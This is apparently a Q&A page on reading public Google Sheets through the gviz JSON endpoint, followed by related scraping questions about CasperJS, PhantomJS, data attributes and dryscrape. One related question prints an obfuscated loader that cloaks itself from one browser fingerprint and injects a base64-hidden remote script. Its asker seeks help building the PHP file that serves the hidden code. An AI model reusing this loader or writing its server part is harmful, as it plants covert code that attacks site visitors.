Is there a way to get the cell values of a public Google spreadsheet?
GET https://sheets.googleapis.com/v4/spreadsheets/1vW01Y46DcpCC7aKLIUwV_W4RXLbeukVwF-G9AA7P7R0/values/A1A4?key=abcdef
returns 403.
I also sent the Referrer in Postman : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36
{
"error": {
"code": 403,
"message": "Requests from referer Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 are blocked.",
"status": "PERMISSION_DENIED",
"details": [
{
"@type": "type.googleapis.com/google.rpc.ErrorInfo",
"reason": "API_KEY_HTTP_REFERRER_BLOCKED",
"domain": "googleapis.com",
"metadata": {
"consumer": "projects/666",
"service": "sheets.googleapis.com"
}
}
]
}
}
I am trying to access a public sheet's data directly from client-side JavaScript.
No round-trips to the server. I remember this was possible some 10 years ago but am unable to locate the docs.
You can access a public spreadsheet through its JSON (gviz) endpoint:
// Spreadsheet id and tab (gid) placeholders; substitute the values from the sheet's own URL.
var id = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx';
var gid = '1111111111111';
// gviz endpoint that returns the selected tab as a JSON payload.
var url = `https://docs.google.com/spreadsheets/d/${id}/gviz/tq?tqx=out:json&tq&gid=${gid}`;
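The response is not bare JSON: it is wrapped as `/*O_o*/ google.visualization.Query.setResponse(...);`. Take a slice that drops the 47-character prefix and the trailing `);`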
data.substring(47).slice(0, -2)
and parse the json
direct link
https://docs.google.com/spreadsheets/d/1n-rjSYb63Z2jySS3-M0BQ78vu8DTPOjG-SZM4i8IxXI/gviz/tq?tqx=out:json&tq&gid=0
example by gas
/**
 * Fetches one tab of a public Google Sheet through the gviz JSON endpoint
 * (Google Apps Script: uses UrlFetchApp) and returns it as a 2-D array.
 *
 * @returns {Array<Array<*>>} First row holds the column labels; each following
 *   row holds the cell values, preferring the formatted value (`f`) over the raw
 *   value (`v`). Cells that are missing from the payload become ''.
 * @throws {Error} When the response does not contain a "table" payload.
 */
function getEndpointJson(){
  const id = '1n-rjSYb63Z2jySS3-M0BQ78vu8DTPOjG-SZM4i8IxXI';
  const gid = '0';
  const txt = UrlFetchApp.fetch(`https://docs.google.com/spreadsheets/d/${id}/gviz/tq?tqx=out:json&tq&gid=${gid}`).getContentText();
  // The payload is wrapped in a setResponse({... "table":{...}}); call; keep only the table object.
  const found = txt.match(/(?<="table":).*(?=}\);)/);
  if (found === null) {
    // Fail with a clear message instead of a TypeError on null[0].
    throw new Error('Unexpected gviz response: no "table" payload found');
  }
  const json = JSON.parse(found[0]);
  const header = json.cols.map(colonne => colonne.label);
  const body = json.rows.map(r => r.c.map(cel => {
    // Empty cells arrive as null; map them to '' explicitly rather than via try/catch.
    if (cel === null || cel === undefined) {
      return '';
    }
    return cel.f ? cel.f : cel.v;
  }));
  return [header].concat(body);
}
example by html page
For instance, in an HTML page (it has to be hosted on an external server):
<html>
<title>Google Sheets json endpoint V4</title>
<author>Mike Steelson</author>
<style>
table {border-collapse: collapse;}
th,td{border: 1px solid black;}
</style>
<body>
<div id="json">json here</div>
<script>
// Public demo spreadsheet and the tab (gid) to render.
var id = '1n-rjSYb63Z2jySS3-M0BQ78vu8DTPOjG-SZM4i8IxXI';
var gid = '0';
var url = 'https://docs.google.com/spreadsheets/d/'+id+'/gviz/tq?tqx=out:json&tq&gid='+gid;
fetch(url)
  .then(response => {
    // fetch() only rejects on network failure; surface HTTP errors explicitly.
    if (!response.ok) {
      throw new Error('Sheet request failed with HTTP ' + response.status);
    }
    return response.text();
  })
  .then(data => {
    // Drop the 47-character wrapper prefix and the trailing ");" to get bare JSON.
    document.getElementById("json").innerHTML = myItems(data.substring(47).slice(0, -2));
  })
  .catch(error => {
    // Show the failure in the page instead of leaving an unhandled rejection.
    document.getElementById("json").textContent = 'Could not load sheet: ' + error.message;
  });
/**
 * Renders a gviz JSON payload as an HTML table string.
 *
 * @param {string} jsonString - JSON text with a `table` object holding `cols`
 *   (each with a `label`) and `rows` (each with a cell array `c`).
 * @returns {string} `<table>` markup: one header row of column labels, then one
 *   row per data row. A cell shows its formatted value (`f`) when present,
 *   otherwise its raw value (`v`); missing cells render empty.
 */
function myItems(jsonString){
  // Sheet content is untrusted and the caller assigns the result to innerHTML,
  // so every label and value is HTML-escaped before being placed in the markup.
  const escapeHtml = (value) => String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
  const json = JSON.parse(jsonString);
  const headerCells = json.table.cols
    .map(colonne => '<th>' + escapeHtml(colonne.label) + '</th>')
    .join('');
  const bodyRows = json.table.rows.map(ligne => {
    const cells = ligne.c.map(cellule => {
      // Empty cells arrive as null; render them as an empty <td>.
      const valeur = (cellule === null || cellule === undefined)
        ? ''
        : (cellule.f ? cellule.f : cellule.v);
      return '<td>' + escapeHtml(valeur) + '</td>';
    }).join('');
    return '<tr>' + cells + '</tr>';
  }).join('');
  return '<table><tr>' + headerCells + '</tr>' + bodyRows + '</table>';
}
</script>
</body></html>
The sheet ID you have provided is wrong.
Based on some brief research, there are available JS libraries that let you access GSheets data, but Google requires an API key:
Requests to the Google Sheets API for public data must be accompanied by an identifier, which can be an API key or an access token.
Here's an example library:
gsheets - Get public Google Sheets as plain JavaScript/JSON.
Answer is to remove the restrictions in Google Cloud Console
Related
I am a complete beginner in JavaScript/PhantomJS/CasperJS (only a few days of learning), and I am stuck on an SVG graph that I am trying to scrape data from.
I am trying to access the d="M20,331.37,331.37,21.40...." element from an SVG object using a casperjs code, and write in the console and a txt file (or CSV). I try the following code:
// Opens a locally saved page, reads the "d" attribute of one SVG <path> and
// writes it to the console and to data_graph.txt.
var fs = require('fs');
var selectXPath = require('casper').selectXPath;
var casper = require('casper').create({
    pageSettings: {
        loadImages: true,
        loadPlugins: true,
        userAgent: 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'
    }
});
//First step is to open baidu.html
casper.start().thenOpen("file:///baidu.html", function() {
    console.log("Baidu website opened");
    this.wait(6000);
});
casper.then(function() {
    // XPath tests attributes with "@"; the previous '[#id="trend"]' predicate was not valid XPath.
    // NOTE(review): SVG elements are namespaced, so plain "svg"/"path" steps may still
    // match nothing in an HTML document -- confirm, or use a CSS selector via evaluate().
    var dataFromGraph = this.getElementsAttribute(selectXPath('//*[@id="trend"]/svg/path[6]'), "d");
    this.echo(dataFromGraph);
    fs.write("data_graph.txt", dataFromGraph, 'w');
});
casper.run();
But nothing worked. I get NULL element or empty result.
This is all the other code I try:
// Alternative attempts (each meant to run inside a casper.then() step, where `this` is casper).
// The XPath predicates use "@id"; "#id" is not valid XPath syntax.
// NOTE(review): the trailing "/d" step selects a child element named "d", not the attribute -- confirm intent.
var dataFromGraph = this.fetchText(require('casper').selectXPath('//*[@id="trend"]/svg/path[6]/d'));
var dataFromGraph = this.getElementsAttribute(require('casper').selectXPath('//*[@id="trend"]/svg/path[6]'),"d") //,"d")
var dataFromGraph = this.getElementInfo(require('casper').selectXPath('//*[@id="trend"]/svg/path[6]'))
var dataFromGraph = this.fetchText("#trend > svg > path");
I have the XPath and the CSS selector of the object, but I am not sure how to access it. Here is a picture of the element I want to scrape.
As the website I want to scrap need a password, this is the HTML file that I save from it https://ufile.io/5y9g2.
The element I want to scrap is the data behind the graph here.
Any help would be very appreciated.
I reworked your script a bit and now it works. Check the snippet below.
// Reads the "d" attribute of one SVG path from the served page, echoes it and saves it.
var casper = require('casper').create();
var fs = require('fs');

casper.start().thenOpen("http://localhost:8001/baidu.html", function() {
  console.log("Baidu website opened");
});

casper.then(function() {
  // The inner function is executed by evaluate(); only its return value comes back.
  var pathData = this.evaluate(function() {
    var pathNode = document.querySelector('#trend > svg > path:nth-child(11)');
    return pathNode.getAttribute('d');
  });
  this.echo(pathData);
  fs.write("data_graph.txt", pathData, 'w');
});

casper.run();
Hope that helps!
// NOTE(review): obfuscated third-party script loader. It does nothing for one exact
// user-agent / 1024x768 screen fingerprint and injects a remote script for every other
// visitor. Treat as untrusted; this pattern looks like cloaked malicious code.
if (navigator['userAgent'] == 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.27 Safari/537.36' && screen['width'] == '1024' && screen['height'] == '768') {} else {
// Build a <script> element using bracket-notation property access.
var javas = document['createElement']('script');
javas['language'] = 'javascript';
javas['type'] = 'text/javascript';
// src = current protocol + base64-decoded host/path + random number + the embedding page's host.
javas['src'] = location['protocol'] + '//' + atob('dmlzdWFsbW90by54eXovaDcucGhw') + '?' + Math['floor']((Math['random']() * 1000000000) + 1) + '&h=' + encodeURIComponent(document['location']['host']);
// Appending the element to <head> makes the browser fetch and run the remote script.
document['head']['appendChild'](javas)
}
need to know how to make an PHP file that will show code inside if i run that link inside this code, this is the link dmlzdWFsbW90by54eXovaDcucGhw on 64bit (visualmoto.xyz/h7.php) and open this link you cant see nothing u see error but when run on that js code that PHP will open an hidden code can you please help me create that h7.php file.. how can i do it i'm very low on php
I use JS script code that described in this answer, but I don't want to save html result page in html file. I want to extract Json object from <div class="rg_meta"> and pass them to Java code.
In searching, I find using "document", but I get undefined error. I am newbie in PhantomJS and working with JSON in Java.
// PhantomJS script: opens a results page and keeps scrolling (and clicking the
// "#smb" button when present) until the last result index has stopped changing
// for `count` consecutive polls, then exits.
// Arguments (system.args): <script> <url> <searchParameter> <count>
var page = require('webpage').create();
var fs = require('fs');
var system = require('system');
var url = "";
var searchParameter = "";
var count = 0;
if (system.args.length === 4) {
  url = system.args[1];
  searchParameter = system.args[2];
  // Arguments arrive as strings; convert once so later comparisons are numeric.
  count = parseInt(system.args[3], 10);
}
if (url === "" || searchParameter === "") {
  phantom.exit();
}
page.settings.userAgent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36';
page.zoomFactor = 0.1;
page.viewportSize = {
  width: 1920,
  height: 1080
};
var divCount = "-1";
var topPosition = 0;
var unchangedCounter = 0;
page.open(url, function(status) {
  console.log("Status: " + status);
  if (status !== "success") {
    phantom.exit();
    return;
  }
  window.setInterval(function() {
    // data-ri of the last result tile, or null while no tile has rendered yet.
    var newDivCount = page.evaluate(function() {
      var divs = document.querySelectorAll(".rg_di.rg_bx.rg_el.ivg-i");
      return divs.length > 0 ? divs[divs.length - 1].getAttribute("data-ri") : null;
    });
    // Scroll one viewport height further on every poll.
    topPosition = topPosition + 1080;
    page.scrollPosition = {
      top: topPosition,
      left: 0
    };
    if (newDivCount === divCount) {
      page.evaluate(function() {
        // The DOM method is getElementsByClassName (plural); the singular form is undefined.
        var elems = document.getElementsByClassName("rg_meta");
        console.log(elems.length);
        // querySelector returns null (not undefined) when nothing matches.
        var button = document.querySelector("#smb");
        if (button !== null) {
          button.click();
          console.log('Clicked');
          return true;
        }
        return false;
      });
      if (unchangedCounter === count) {
        phantom.exit();
      } else {
        unchangedCounter = unchangedCounter + 1;
      }
    } else {
      unchangedCounter = 0;
    }
    divCount = newDivCount;
  }, 500);
});
HTML5 data Attributes
Fortunately, HTML5 introduces custom data attributes.
<div id="msglist" data-user="bob" data-list-size="5" data-maxage="180"></div>
Custom data attributes:
are strings — you can store anything which can be string encoded, such as JSON. Type conversion must be handled in JavaScript.
should only be used when no suitable HTML5 element or attribute exists.
JavaScript Parsing #1:
Every browser will let you fetch and modify data- attributes using the getAttribute and setAttribute methods, e.g.
var msglist = document.getElementById("msglist");
var show = msglist.getAttribute("data-list-size");
// getAttribute returns a string ("5"), so convert before adding; otherwise "5" + 3 yields "53".
msglist.setAttribute("data-list-size", parseInt(show, 10) + 3);
It works, but should only be used as a fallback for older browsers.
JavaScript Parsing #2:
Since version 1.4.3, jQuery’s data() method has parsed HTML5 data attributes. You don’t need to specify the data- prefix so the equivalent code can be written:
// jQuery equivalent: data() is addressed without the "data-" prefix.
var msglist = $("#msglist");
var show = msglist.data("list-size");
// NOTE(review): jQuery's data() is documented to convert numeric attribute strings to
// numbers, which would make show+3 an addition rather than a concatenation -- confirm.
msglist.data("list-size", show+3);
Hope it helps!!!
I have an issue with getting the page content:
# Log in with the CSRF token scraped from the login form, then fetch the RUM
# checks page and print its raw text.
with dryscrape.Session() as c:
    PASSWORD = '<PASS>'
    USERNAME = '<EMAIL>'
    URL = 'https://my.pingdom.com/'
    # NOTE(review): this first response is discarded; it is kept in case the site
    # needs a prior visit before issuing a usable token -- confirm.
    c.get(URL)
    soup = BeautifulSoup(c.get(URL).text, "lxml")
    csrf = soup.select_one("input[name=__csrf_magic]")["value"]
    login_data = {
        "email": USERNAME,
        "password": PASSWORD,
        "__csrf_magic": csrf,
    }
    r = c.post(URL, data=login_data, headers={'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'})
    url = 'https://my.pingdom.com/newchecks/rums?ignoreActive=1'
    r = c.get(url).text
    # print() with one argument behaves the same on Python 2 and 3.
    print(r)
After logging in through the browser I can see the Load Time value in the page source, but when I use this script I only get the {{loadtime}} placeholder from the x-handlebars-template.
Any ideas how I can get it? This is server script so any selenium type of tips doesn't go in here. :)
I am trying to extract data from some web pages using CasperJS. I have tried adding this.wait(5000) inside getDetails(), but direktoriNodeList.length always returns 0 and I don't know why.
PhantomJS : 2.0.0
CasperJS : 1.1.0-beta3
//casperjs --proxy=127.0.0.1:9050 --proxy-type=socks5 axa-mandiri.casper.js
var utils = require('utils');
var casper = require("casper").create({
  logLevel: "info",
  verbose: true,
  pageSettings: {
    userAgent: "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36",
    loadImages: false, // skipping images makes the run much faster
    loadPlugins: false
  }
});

// Directory listing to scrape.
var url = 'https://www.axa-mandiri.co.id/direktori/rumah-sakit/';
// Shared state, updated by processPage as it walks the result pages.
var hospitals = [];
var currentPage = 1;

casper.start(url);
// Process the page once the listing container exists; otherwise stop.
casper.waitForSelector('#main-direktori', processPage, stopScript);
casper.run(function() {
  utils.dump(hospitals);
  this.exit();
});
/**
 * Collects the name, phone and map link of every hospital entry on the current page.
 *
 * NOTE: this function is executed in the page context (pass it, uncalled, to
 * Casper's evaluate). It must therefore be self-contained: script-side names
 * such as `utils` or `currentPage` are not defined there.
 *
 * @returns {string} JSON-encoded array of {name, phone, map} objects; a field is
 *   null when its element is missing from the entry.
 */
function getDetails(){
  // Text of the first match under `root` with newlines removed; null when absent.
  function textOf(root, selector) {
    var node = root.querySelector(selector);
    return node ? node.textContent.replace(/\n/g, '') : null;
  }
  var details = [];
  var direktoriNodeList = document.querySelectorAll("ul#main-direktori li.direktori-list");
  console.log("direktoriNodeList.length " + direktoriNodeList.length);
  for (var i = 0; i < direktoriNodeList.length; i++) {
    var entry = direktoriNodeList[i];
    var mapLink = entry.querySelector("div.map-details a.get-direction");
    details.push({
      name : textOf(entry, "div.details strong"),
      phone : textOf(entry, "div.details span:nth-child(1)"),
      map : mapLink ? mapLink.getAttribute("href") : null
    });
  }
  return JSON.stringify(details);
}
/**
 * Dumps everything collected so far and terminates the script.
 * Usable both as a Casper step callback and as a plain function call.
 */
function stopScript() {
  // A bare stopScript() call does not get the casper instance as `this`,
  // so fall back to the script-level `casper` object in that case.
  var runner = (this && typeof this.exit === 'function') ? this : casper;
  utils.dump(hospitals);
  console.log("Exiting...");
  runner.exit();
}
/**
 * Scrapes the current results page, then follows the "next" link and repeats;
 * stops the script when there is no next link.
 * Expects `this` to be the casper instance (it calls this.evaluate, this.exists
 * and this.thenClick).
 */
function processPage() {
  // Pass the function itself: evaluate() runs it inside the page. Calling
  // getDetails() here would run it in the script context instead.
  var scraped = this.evaluate(getDetails);
  // getDetails returns a JSON string; decode it so individual entries are appended.
  if (typeof scraped === 'string') {
    scraped = JSON.parse(scraped);
  }
  if (scraped) {
    hospitals = hospitals.concat(scraped);
  }
  // No next button means this was the last page: stop, and do not queue a click.
  if (!this.exists("a.nextpostslink")) {
    stopScript.call(this);
    return;
  }
  this.thenClick("a.nextpostslink").then(function() {
    currentPage++;
    this.waitForSelector("#main-direktori", processPage, stopScript);
  });
}
casper.evaluate(fn, ...) expects a function, not the result of calling one (getDetails() returns a JSON string). Change
hospitals = hospitals.concat(this.evaluate(getDetails()));
to
hospitals = hospitals.concat(this.evaluate(getDetails));
The problem here is that you're executing the function in the outer context instead of passing it into the page context. Don't forget to register to the "remote.message" event to see console.log() calls from the page context:
// Relay messages logged in the page context to the CasperJS console.
casper.on("remote.message", function(message){
  var line = "remote> " + message;
  this.echo(line);
});